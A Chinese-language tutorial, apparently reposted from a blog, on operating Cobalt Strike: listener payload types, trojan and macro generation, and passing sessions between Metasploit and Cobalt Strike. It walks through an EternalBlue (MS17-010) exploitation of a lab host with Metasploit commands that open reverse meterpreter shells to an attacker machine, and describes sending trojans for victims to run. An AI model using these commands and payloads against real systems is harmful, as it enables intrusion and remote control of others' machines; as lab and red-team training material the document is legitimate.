Cobalt Strike
簡介
Cobalt Strike 分為客戶端組件和服務器組件,服務器的組件也是團隊服務器,可以放在 局域網或者公網下進行團隊使用,也是 Cobalt Strike 社會工程功能的托管機器,團隊服務器 還可以存盤由 Cobalt Strike 收集的資料,并且進行日志管理 Cobalt Strike 服務器必須在 Linux 系統上運行,這里演示服務器在 Linux KALI 端,本地進行 Cobalt Strike 客戶端的連接,
CobaltStrike 集成了埠轉發、服務掃描,自動化溢位,多模式埠監聽,windows exe 木 馬生成,windows dll 木馬生成,java 木馬生成,office 宏病毒生成,木馬捆綁,釣魚攻擊 包,
CS的使用
啟動 CS 服務端
啟動客戶端 服務端啟動后客戶端啟動進行連接(團隊多人連接將用戶名設定為自己的用來區分團隊成員)
主界面
功能使用(主機上線)
1.設定監聽器用來接識訓話
name:監聽器名字
payload:payload 型別
Host: shell 反彈的主機,
kali IP Port: 反彈埠
這里 Payload 有 9 種選項,如下
內部的 Listener
windows/beacon_dns/reverse_dns_txt
windows/beacon_dns/reverse_http
windows/beacon_http/reverse_http
windows/beacon_https/reverse_https windows/beacon_smb/bind_pipe
外部的 Listener
windows/foreign/reverse_dns_txt
windows/foreign/reverse_http
windows/foreign/reverse_https
windows/foreign/reverse_tcp
Beacon 為內置的監聽器,在目標主機執行相應的 payload,獲取 shell 到 cs 上;其中包含 DNS、 HTTP、HTTPS 等,Beacon 可以選擇通過 DNS 還是 HTTP/S 協議出口網路,甚至可以在使用 Beacon 通訊程序中切換 HTTP 和 DNS,其支持多主機連接,部署好 Beacon 后提交一個要連 回的域名或主機的串列,Beacon 將通過這些主機輪詢,目標網路的防護團隊必須攔截所有 的串列中的主機才可中斷和其網路的通訊,通過種種方式獲取 shell 以后(比如直接運行生 成的 exe),就可以使用 Beacon 了,
Foreign 為外部結合的 Listener,經常用于 MSF 的結合,例如獲取meterpreter 到 MSF 上
2.生成木馬
HTML Application 生成惡意的 HTA 木馬檔案;
MS Office Macro 生成 office 宏病毒檔案;
Payload Generator 生成各種語言版本的 payload;
Windows Executable 生成可執行 exe 木馬;
Windows Executable(S) 生成無狀態的可執行 exe 木馬
這是生成 exe 檔案,還可以生成宏病毒等上面介紹到的
生成后會保存到指定地方,通過某種方式上傳到對方機器上,可以通過 Webshell 方式等這 里不在講解了 受害者運行 exe 檔案我們的 CS 就直接上線了
發送給用戶,用戶雙擊我們的cs上就成功上線了主機
3.正常我們進去需要調整回應的時間,sleep 3 就行,
可以對我們上線的機器進行以下操作,也可以聯動 MSF 進行使用
聯動 MSF 使用
將 MSF 的會話轉發到 CS 上
通過漏洞復現演示 MSF 獲取目標 Session
KALI:192.168.50.218
CS:192.168.50.130
受害者 IP:192.168.50.185
1.發現漏洞
- Nmap -A 掃描目標開放了 445 埠
通過使用 MSF 輔助模塊掃描發現存在 ms17_010 漏洞
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.50.185
exploit
2. 查找漏洞利用模塊
漏洞利用
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set RHOST 192.168.50.185
Run
獲取后 我們 background 獲取 session
與 CS 聯動,將會話轉發到 CS 中
CS 配置新建一個監聽
KALI 中配置
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set lhost 192.168.50.218 //KALI IP
set lport 4443 與 CS 同埠
set session 1
CS 這邊就接收到了 MSF 的會話
CS 的會話轉發到 MSF 中
由于生成的木馬就是 HTTP 的,所以委派給 msf 時,監聽器還是 HTTP 的 CS 添加一個監聽器
MSF 準備
Use exploit/multi/handler
Set payload windows/meterpreter/reverse_http
Set lhost ip
Set lport ip
設定完成后我們就可以使用 CS 進行委派會話了
選中我們剛剛創建的就行
這樣我們的 MSF 端就會獲取到這個會話 CS 還有非常多的功能,大家慢慢發現!
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/394223.html
標籤:其他